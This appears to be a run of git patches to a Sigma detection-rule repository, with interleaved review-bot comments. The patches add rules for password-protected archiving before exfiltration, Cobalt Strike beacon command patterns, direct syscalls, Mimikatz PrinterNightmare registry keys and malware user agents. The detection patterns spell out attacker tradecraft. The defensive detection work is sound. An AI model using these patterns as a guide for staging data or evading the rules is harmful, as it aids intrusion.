From: Florian Roth Date: Tue, 27 Jul 2021 10:14:53 +0200 Subject: [PATCH 0118/1367] fix: bug in author field (cannot be a list) --- .../win_process_creation_bitsadmin_download.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml index f6c8a5fb..508bc93c 100644 --- a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +++ b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml @@ -14,9 +14,7 @@ tags: - attack.t1036.003 date: 2017/03/09 modified: 2021/07/16 -author: - - Michael Haag - - FPT.EagleEye +author: Michael Haag, FPT.EagleEye logsource: category: process_creation product: windows From 8b82fbf36b48990fe0fa307381f6c739028c1ff6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 10:34:46 +0200 Subject: [PATCH 0119/1367] update detection --- .../process_creation/win_susp_rar_flags.yml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_rar_flags.yml b/rules/windows/process_creation/win_susp_rar_flags.yml index 16413091..b4a58ce1 100644 --- a/rules/windows/process_creation/win_susp_rar_flags.yml +++ b/rules/windows/process_creation/win_susp_rar_flags.yml 
@@ -1,12 +1,14 @@ title: Rar with Password or Compression Level id: faa48cae-6b25-4f00-a094-08947fef582f status: experimental -description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. +description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. references: - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ + - https://ss64.com/bash/rar.html + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md author: '@ROxPinTeddy' date: 2020/05/12 -modified: 2020/08/28 +modified: 2021/07/27 tags: - attack.collection - attack.t1560.001 @@ -16,11 +18,14 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_password: + CommandLine|contains: - ' -hp' + selection_other: + CommandLine|contains: - ' -m' - condition: selection + - ' a ' + condition: selection_password and selection_other falsepositives: - Legitimate use of Winrar command line version - Other command line tools, that use these flags From 227e4bca131e4f3e5dca1f7ad66423660a161ff1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 10:57:32 +0200 Subject: [PATCH 0120/1367] add process_creation_susp_winzip.yml --- .../process_creation_susp_winzip.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_winzip.yml diff --git a/rules/windows/process_creation/process_creation_susp_winzip.yml b/rules/windows/process_creation/process_creation_susp_winzip.yml new file mode 100644 index 00000000..da7d2a78 --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_winzip.yml 
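Review bot: The new `condition: selection_password and selection_other` in the second hunk now requires ` -hp` on every match, but the (unchanged) description still says "password protection or with a specific compression level", so an archive created with only a compression level no longer fires while the text claims it does. Either restore an OR between the two selections or align the description, e.g. `description: Detects rar.exe invoked on the command line with the -hp password switch together with an add (a) or compression-level (-m) switch`. The single-space prefix in `' -m'` also matches any switch beginning with -m, which is broader than "compression level"; worth a comment if that breadth is intended.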
@@ -0,0 +1,30 @@ +title: Compress Data and Lock With Password for Exfiltration With WINZIP +id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d +status: experimental +author: frack113 +date: +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_winzip: + CommandLine|contains: + - 'winzip.exe' + - 'winzip64.exe' + selection_password: + CommandLine|contains: + - '-s"' + selection_other: + CommandLine|contains: + - ' -min ' + - ' -a ' + condition: all of them +falsepositives: + - Unknown +level: medium From ea56db2bed0501319c61361b2e92c20f76fbfa7f Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 11:09:35 +0200 Subject: [PATCH 0121/1367] forget date field --- rules/windows/process_creation/process_creation_susp_winzip.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_susp_winzip.yml b/rules/windows/process_creation/process_creation_susp_winzip.yml index da7d2a78..2e668c63 100644 --- a/rules/windows/process_creation/process_creation_susp_winzip.yml +++ b/rules/windows/process_creation/process_creation_susp_winzip.yml @@ -2,7 +2,7 @@ title: Compress Data and Lock With Password for Exfiltration With WINZIP id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d status: experimental author: frack113 -date: +date: 2021/07/27 description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md From 5d039dd138fa22800b7c70282c24b0ba64a0b3f7 Mon Sep 17 00:00:00 2001 
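Review bot: The `description` of the new winzip rule is the generic ATT&CK T1560.001 sentence and does not say what the selections actually match; suggest `description: Detects WinZip invoked from the command line with the -s password switch together with an add (-a) or -min action, a pattern seen when staging data before exfiltration`. The password pattern `'-s"'` only matches when the switch is immediately followed by a double quote, so confirm that narrowed scope is intentional and record it in a comment next to `selection_password`. `falsepositives: - Unknown` could at least name legitimate scripted backups that use the same switches.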
From: Florian Roth Date: Tue, 27 Jul 2021 11:24:40 +0200 Subject: [PATCH 0122/1367] rule: Cobalt Strike patterns --- .../win_cobaltstrike_process_patterns.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/process_creation/win_cobaltstrike_process_patterns.yml diff --git a/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml new file mode 100644 index 00000000..0923753e --- /dev/null +++ b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml @@ -0,0 +1,34 @@ +title: CobaltStrike Process Patterns +id: f35c5d71-b489-4e22-a115-f003df287317 +status: experimental +description: Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) +author: Florian Roth +references: + - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ +date: 2021/07/27 +tags: + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection1: + CommandLine|contains: '\cmd.exe /C whoami' + ParentImage|startswith: 'C:\Temp' + selection2: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\.\pipe' + selection3: + CommandLine|contains: + - 'cmd.exe /c echo' + - '> \\.\pipe' + - '\whoami.exe' + ParentImage|endswith: '\dllhost.exe' + condition: 1 of them +falsepositives: + - Other programs that cause these patterns (please report) +level: high + From 54e6e36ecc79017d390adcdbee6895ca0a12148c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 12:54:39 +0200 Subject: [PATCH 0123/1367] add process_creation_susp_7z.yml --- .../process_creation_susp_7z.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_7z.yml 
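Review bot: The named-pipe fragment is spelled two ways in the new CobaltStrike process-pattern rule, `' > \\.\pipe'` in `selection2` and `'> \\.\pipe'` in `selection3`; if the leading space is deliberate a short comment would prevent a later "fix" that harmonises them, otherwise use one form in both lists. The file also ends with an added empty line after `level: high`, which the other rules in this series do not carry. `tags` lists only `attack.execution`; the referenced write-up describes discovery-style activity (`whoami`), so `attack.discovery` may be worth adding, but that is a judgement call for the author.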
diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml new file mode 100644 index 00000000..dc653cfe --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -0,0 +1,33 @@ +title: Compress Data and Lock With Password for Exfiltration With 7-ZIP +id: 9fbf5927-5261-4284-a71d-f681029ea574 +status: experimental +author: frack113 +date: 2021/07/27 +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_7z: + CommandLine|contains: + - '7z.exe' + selection_password: + CommandLine|contains: + - ' -p' + selection_action: + CommandLine|contains: + - ' a ' + - ' u ' + condition: all of them +falsepositives: + - Unknown +level: medium +fields: + - CommandLine + - ParentCommandLine + - CurrentDirectory \ No newline at end of file From c31bc05aae0a5b6d7750c757d8fbd294b6355092 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 15:22:44 +0200 Subject: [PATCH 0124/1367] Update process_creation_susp_7z.yml --- .../process_creation/process_creation_susp_7z.yml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml index dc653cfe..5f2ebc54 100644 --- a/rules/windows/process_creation/process_creation_susp_7z.yml +++ b/rules/windows/process_creation/process_creation_susp_7z.yml 
@@ -14,20 +14,19 @@ logsource: product: windows detection: selection_7z: - CommandLine|contains: + Image|endswith: - '7z.exe' - selection_password: - CommandLine|contains: + - '7za.exe' + selection_param: + CommandLine|contains|all: - ' -p' - selection_action: - CommandLine|contains: - ' a ' - ' u ' - condition: all of them + condition: selection_7z and selection_param falsepositives: - - Unknown + - Command line parameter combinations that contain all included strings level: medium fields: - CommandLine - ParentCommandLine - - CurrentDirectory \ No newline at end of file + - CurrentDirectory From 428995d00e35b45aa2767ba0d0c1e614009d12f0 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 15:24:39 +0200 Subject: [PATCH 0125/1367] Update process_creation_susp_7z.yml --- .../process_creation/process_creation_susp_7z.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml index 5f2ebc54..c9042a04 100644 --- a/rules/windows/process_creation/process_creation_susp_7z.yml +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -15,14 +15,15 @@ logsource: detection: selection_7z: Image|endswith: - - '7z.exe' - - '7za.exe' - selection_param: - CommandLine|contains|all: - - ' -p' + - '\7z.exe' + - '\7za.exe' + selection_password: + CommandLine|contains: ' -p' + selection_action: + CommandLine|contains: - ' a ' - ' u ' - condition: selection_7z and selection_param + condition: all of them falsepositives: - Command line parameter combinations that contain all included strings level: medium From 87a911a15e3996d525693e96cbd3f1869b3617b3 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 16:02:09 +0200 Subject: [PATCH 0126/1367] Update process_creation_susp_7z.yml --- rules/windows/process_creation/process_creation_susp_7z.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/rules/windows/process_creation/process_creation_susp_7z.yml b/rules/windows/process_creation/process_creation_susp_7z.yml index c9042a04..8a852dc0 100644 --- a/rules/windows/process_creation/process_creation_susp_7z.yml +++ b/rules/windows/process_creation/process_creation_susp_7z.yml @@ -14,9 +14,9 @@ logsource: product: windows detection: selection_7z: - Image|endswith: - - '\7z.exe' - - '\7za.exe' + CommandLine|contains: + - '7z.exe' + - '7za.exe' selection_password: CommandLine|contains: ' -p' selection_action: From 6b076d43607d31ed838e190417c7f828950cd010 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 19:14:00 +0200 Subject: [PATCH 0127/1367] Add test_optional_author --- .../process_creation/sysmon_apt_sourgrum.yml | 4 +--- .../win_process_creation_bitsadmin_download.yml | 4 +--- tests/test_rules.py | 13 +++++++++++++ 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 8ea9ea53..1a6c50cd 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -1,9 +1,7 @@ title: SOURGUM Actor Behaviours id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM -author: - - MSTIC - - FPT.EagleEye +author: MSTIC, FPT.EagleEye status: experimental level: high references: diff --git a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml index f6c8a5fb..508bc93c 100644 --- a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +++ b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml 
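Review bot: This hunk moves `selection_7z` back from `Image|endswith` (introduced two commits earlier) to `CommandLine|contains`, which widens the rule to any process whose command line merely mentions 7z.exe, for instance a shell or script that launches it; the commit message does not say why. A one-line comment on the selection, such as `# CommandLine rather than Image so invocations via cmd/powershell wrappers are also caught`, would keep the next editor from flipping it again. If the narrower form was dropped by mistake, combining both (`Image|endswith` or `CommandLine|contains`) keeps the original precision.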
@@ -14,9 +14,7 @@ tags: - attack.t1036.003 date: 2017/03/09 modified: 2021/07/16 -author: - - Michael Haag - - FPT.EagleEye +author: Michael Haag, FPT.EagleEye logsource: category: process_creation product: windows diff --git a/tests/test_rules.py b/tests/test_rules.py index cc8a9dab..c5fe28c6 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -397,6 +397,19 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") + def test_optional_author(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + author_str = self.get_rule_part(file_path=file, part_name="author") + if author_str: + # it exists but isn't a string + if not isinstance(author_str, str): + print(Fore.YELLOW + "Rule {} has a 'author' field that isn't a string.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'author' fields. (has to be a string even if it contains many author)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From 5818a0debe99f8c3f7fe1f2ab54e326dc3c5d4f2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 27 Jul 2021 17:14:28 -0500 Subject: [PATCH 0128/1367] Update aws_elasticache_security_group_modified_or_deleted.yml --- ...che_security_group_modified_or_deleted.yml | 22 ++++++++----------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml index eab2a71a..26e32527 100644 --- a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml 
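Review bot: `test_optional_author` in the tests/test_rules.py hunk only checks the type when `author_str` is truthy, so a rule with `author: []` or `author: ''` passes the new check although neither is a string. Guarding on presence instead of truthiness closes that gap: `if author_str is not None and not isinstance(author_str, str):`. The failure message has a small grammar slip, `even if it contains many author` should read `even if it contains many authors`. Note that this commit also re-applies the two author-field fixes already made in 0117 and 0118 against the same pre-image blobs, so one of the pair will not apply cleanly in sequence.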
@@ -9,19 +9,15 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: elasticache.amazonaws.com - selection_eventname1: - - eventName: "Delete Cache Security Group" - selection_eventname2: - - eventName: "Authorize Cache Security Group Ingress" - selection_eventname3: - - eventName: "Revoke Cache Security Group Ingress" - selection_eventname4: - - eventName: "AuthorizeCacheSecurityGroupEgress" - selection_eventname5: - - eventName: "RevokeCacheSecurityGroupEgress" - condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 + selection: + eventSource: elasticache.amazonaws.com + eventName: + - "Delete Cache Security Group" + - "Authorize Cache Security Group Ingress" + - "Revoke Cache Security Group Ingress" + - "AuthorizeCacheSecurityGroupEgress" + - "RevokeCacheSecurityGroupEgress" + condition: selection level: low tags: - attack.impact From 8a885dd0982f61f7f07af91b456493405efb9ff5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 28 Jul 2021 13:17:40 +0200 Subject: [PATCH 0129/1367] add process_creation_automated_collection.yml --- .../process_creation_automated_collection.yml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_automated_collection.yml diff --git a/rules/windows/process_creation/process_creation_automated_collection.yml b/rules/windows/process_creation/process_creation_automated_collection.yml new file mode 100644 index 00000000..ab979f73 --- /dev/null +++ b/rules/windows/process_creation/process_creation_automated_collection.yml 
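Review bot: Three of the five `eventName` values in the rewritten selection contain spaces (`"Delete Cache Security Group"`, `"Authorize Cache Security Group Ingress"`, `"Revoke Cache Security Group Ingress"`), but CloudTrail records the API action name without spaces, so those entries will not match; the last two entries already use the space-less form. They should read `DeleteCacheSecurityGroup`, `AuthorizeCacheSecurityGroupIngress` and `RevokeCacheSecurityGroupIngress`. I could not map the two `*CacheSecurityGroupEgress` names to ElastiCache API actions, so confirm they exist before keeping them. The consolidation itself is an improvement, since the old `a and b or c or ...` condition let the `eventSource` check be bypassed by operator precedence.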
@@ -0,0 +1,38 @@ +title: Automated Collection Command Prompt +id: f576a613-2392-4067-9d1a-9345fb58d8d1 +status: experimental +author: frack113 +date: 2021/07/28 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + category: process_creation + product: windows +detection: + selection_ext: + CommandLine|contains: + - '.doc' + - '.docx' + - '.xls' + - '.xlsx' + - '.ppt' + - '.pptx' + - '.rtf' + - '.pdf' + - '.txt' + selection_dir: + CommandLine|contains|all: + - 'dir ' + - ' /b ' + - ' /s ' + selection_findstr: + OriginalFileName: FINDSTR.EXE + CommandLine|contains: ' /e ' + condition: selection_ext and (selection_dir or selection_findstr) +falsepositives: + - Unknown +level: medium From 2758c1aa934c70118f099955c33a1219ed4160b0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 28 Jul 2021 14:14:02 +0200 Subject: [PATCH 0130/1367] add powershell_automated_collection.yml --- .../powershell_automated_collection.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/windows/powershell/powershell_automated_collection.yml diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_automated_collection.yml new file mode 100644 index 00000000..b3e00512 --- /dev/null +++ b/rules/windows/powershell/powershell_automated_collection.yml 
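Review bot: In `selection_ext` the entries `.docx`, `.xlsx` and `.pptx` are redundant with `contains`, because any value containing `.docx` already contains `.doc` (likewise `.xls`/`.xlsx`, `.ppt`/`.pptx`); the same list appears in the next commit's rules/windows/powershell/powershell_automated_collection.yml. Dropping the `x` variants, or adding a comment that they are kept for readability, avoids the impression that they widen coverage. In `selection_dir` the values `' /b '` and `' /s '` require a trailing space, so a switch that ends the command line is not matched; if that is acceptable, say so in a comment, otherwise `' /b'`/`' /s'` with the trailing space removed is the safer form.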
@@ -0,0 +1,39 @@ +title: Automated Collection Command PowerShell +id: c1dda054-d638-4c16-afc8-53e007f3fbc5 +status: experimental +author: frack113 +date: 2021/07/28 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection_eventid: + EventID: 4104 + selection_ext: + ScriptBlockText|contains: + - '.doc' + - '.docx' + - '.xls' + - '.xlsx' + - '.ppt' + - '.pptx' + - '.rtf' + - '.pdf' + - '.txt' + selection_cmd: + ScriptBlockText|contains|all: + - 'Get-ChildItem' + - ' -Recurse ' + - ' -Include ' + + condition: all of them +falsepositives: + - Unknown +level: medium From aefd50f049e72ee8f2b82bbe03a7b4eb09daba41 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 28 Jul 2021 14:23:54 +0200 Subject: [PATCH 0131/1367] fix: avoid FPs with HTool string --- rules/windows/builtin/win_av_relevant_match.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_av_relevant_match.yml b/rules/windows/builtin/win_av_relevant_match.yml index cbf84be0..6c1d18d5 100644 --- a/rules/windows/builtin/win_av_relevant_match.yml +++ b/rules/windows/builtin/win_av_relevant_match.yml @@ -3,14 +3,14 @@ id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8 description: This detection method points out highly relevant Antivirus events author: Florian Roth date: 2017/02/19 -modified: 2021/01/07 +modified: 2021/07/28 logsource: product: windows service: application detection: keywords: Message|contains: - - "HTool" + - "HTool-" - "Hacktool" - "ASP/Backdoor" - "JSP/Backdoor" From 2866a1dbdc64c0182afd79590417e5d6b2cbe988 Mon Sep 17 00:00:00 2001 
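Review bot: There is a stray empty line inside `detection:` between the `selection_cmd` list and `condition: all of them` in the new PowerShell rule, which none of the sibling rules carry; removing it keeps the block consistent with the rest of the repository. Since `selection_eventid` fixes `EventID: 4104`, the `definition: 'Script block logging must be enabled'` note is accurate and worth keeping. The extension list shares the `.doc`/`.docx` redundancy noted on the process_creation variant in the previous commit.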
From: phantinuss Date: Wed, 28 Jul 2021 15:13:55 +0200 Subject: [PATCH 0132/1367] fix: change howto to match current state of code --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index cc8a9dab..8f7cb15c 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -3,7 +3,7 @@ Checks for noncompliance or common errors on all rules Run using the command -# python -m unittest test_rules.py +# python test_rules.py """ import os From 9833cc34e5842757bc95c566f48ad1b04c072fe4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 28 Jul 2021 15:14:30 +0200 Subject: [PATCH 0133/1367] direct syscall to NtOpenProcess --- .../sysmon_direct_syscall_ntopenprocess.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100755 rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml diff --git a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml new file mode 100755 index 00000000..05865dff --- /dev/null +++ b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml @@ -0,0 +1,22 @@ +title: Direct Syscall of NtOpenProcess +id: 3f3f3506-1895-401b-9cc3-e86b16e630d0 +description: Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF. +references: + - https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6 +status: experimental +author: Christian Burkard +date: 2021/07/28 +logsource: + category: process_access + product: windows +detection: + selection: + CallTrace|startswith: + - 'UNKNOWN' + condition: selection +falsepositives: + - unkown +level: critical +tags: + - attack.execution + - attack.t1106 From 46da416ad1310929dc0937dcc92ddf1e4fd5d01b Mon Sep 17 00:00:00 2001 
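Review bot: `falsepositives: - unkown` in the new NtOpenProcess rule is misspelled and should read `- Unknown` to match the other rules. With `level: critical` and a single `CallTrace|startswith: 'UNKNOWN'` criterion, the rule will fire on any process-access event whose first frame is not backed by a module, and legitimate software that runs code from dynamically allocated memory is a plausible source of noise (JIT runtimes are the usual suspects, to be confirmed by baselining); listing the expected benign sources under `falsepositives`, or starting at `high` until the rule is baselined, would set operator expectations. A one-element list for `startswith` could also be written as the scalar `CallTrace|startswith: 'UNKNOWN'`.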
From: Wietze Date: Wed, 28 Jul 2021 14:43:51 +0100 Subject: [PATCH 0134/1367] Fixing exception caused by incorrect type of passed 'path' parameter --- tools/sigma/config/collection.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/config/collection.py b/tools/sigma/config/collection.py index cced47b2..cf870557 100644 --- a/tools/sigma/config/collection.py +++ b/tools/sigma/config/collection.py @@ -51,7 +51,7 @@ class SigmaConfigurationManager(object): if path.exists() ] elif isinstance(paths, Iterable) and all([type(path) is str for path in paths]): - self.paths = paths + self.paths = [Path(path) for path in paths] else: raise TypeError("None or iterable of strings expected as paths") From 7f820c7b29e70c29259cfe805cabaf7827c71944 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 28 Jul 2021 16:20:21 +0200 Subject: [PATCH 0135/1367] rule updates --- rules/proxy/proxy_ua_malware.yml | 1 + .../win_registry_mimikatz_printernightmare.yml | 13 +++++++++++-- 2 files changed, 12 insertions(+), 2 deletions(-) diff --git a/rules/proxy/proxy_ua_malware.yml b/rules/proxy/proxy_ua_malware.yml index 3d0ce0d7..45a433e7 100644 --- a/rules/proxy/proxy_ua_malware.yml +++ b/rules/proxy/proxy_ua_malware.yml @@ -71,6 +71,7 @@ detection: - 'agent *' - 'AutoIt' # Suspicious - base-lining recommended - 'IczelionDownLoad' + - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/ condition: selection fields: - ClientIP diff --git a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml index 076b0241..44c2e943 100644 --- a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml +++ b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml 
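Review bot: The fixed branch in tools/sigma/config/collection.py now wraps each string in `Path`, but unlike the preceding branch, whose `if path.exists()` filter is visible as context, it keeps non-existent paths; if callers rely on `self.paths` pointing at files that exist, the same filter should apply here (`self.paths = [Path(path) for path in paths if Path(path).exists()]`). The `elif` guard can also use the idiomatic form `all(isinstance(path, str) for path in paths)` instead of `type(path) is str` inside a materialised list. The enclosing `__init__` starts outside this hunk, so the first branch is only partially visible and this is inferred.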
@@ -12,7 +12,7 @@ tags: - cve.2021-1675 - cve.2021-34527 date: 2021/07/04 -modified: 2021/07/08 +modified: 2021/07/28 logsource: product: windows category: registry_event @@ -25,7 +25,16 @@ detection: TargetObject|contains|all: - 'legitprinter' - '\Control\Print\Environments\Windows' - condition: selection or selection_alt + selection_print: + TargetObject|contains: + - '\Control\Print\Environments' + - '\CurrentVersion\Print\Printers' + selection_kiwi: + TargetObject|contains: + - 'Gentil Kiwi' + - 'mimikatz printer' + - 'Kiwi Legit Printer' + condition: selection or selection_alt or (selection_print and selection_kiwi) falsepositives: - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) level: critical \ No newline at end of file From bd123536dfa3b646c8af8106e61b357adce28e31 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 28 Jul 2021 18:19:23 +0200 Subject: [PATCH 0136/1367] fix duplicate UUID --- rules/cloud/aws_sts_assumedrole_misuse.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml index 869c4f2d..75ecc209 100644 --- a/rules/cloud/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws_sts_assumedrole_misuse.yml @@ -1,5 +1,5 @@ title: AWS STS AssumedRole Misuse -id: b45ab1d2-712f-4f01-a751-df3826969807 +id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. author: Austin Songer status: experimental From e0d6856987e2c8f8e7b8373687c350c6329fe42d Mon Sep 17 00:00:00 2001 From: Wietze Date: Thu, 29 Jul 2021 13:57:58 +0100 Subject: [PATCH 0137/1367] [CarbonBlack] Adding extra escape character Hyphens, especially when at the start of a query, need escaping since hyphens are also used to negate conditions --- tools/sigma/backends/carbonblack.py | 1 + 1 file changed, 1 insertion(+) 
diff --git a/tools/sigma/backends/carbonblack.py b/tools/sigma/backends/carbonblack.py index 1a147629..cf517577 100644 --- a/tools/sigma/backends/carbonblack.py +++ b/tools/sigma/backends/carbonblack.py @@ -81,6 +81,7 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB '|', ';', ':', + '-' ] def __init__(self, *args, **kwargs): From 687631ee202351260f1f46485f7fdae5837cfca3 Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 28 Jul 2021 17:24:26 +0100 Subject: [PATCH 0138/1367] Several updates to CarbonBlack EEDR config --- tools/config/carbon-black-eedr.yml | 54 +++++++----------------------- 1 file changed, 13 insertions(+), 41 deletions(-) diff --git a/tools/config/carbon-black-eedr.yml b/tools/config/carbon-black-eedr.yml index dbdd9a21..0e7c4fff 100644 --- a/tools/config/carbon-black-eedr.yml +++ b/tools/config/carbon-black-eedr.yml 
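Review bot: The new `'-'` entry in the escape list lacks the trailing comma that the preceding entries (`';',`, `':',`) carry, so the next addition will have to touch this line again; `'-',` keeps the convention. The commit message motivates the change with hyphens at the start of a query, while the list escapes the character wherever it appears in a value; that is harmless as long as the backend accepts an escaped hyphen mid-token, but a short comment on the entry, such as `# leading '-' negates a term in the CB query syntax`, records why it is here. The enclosing class starts outside this hunk.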
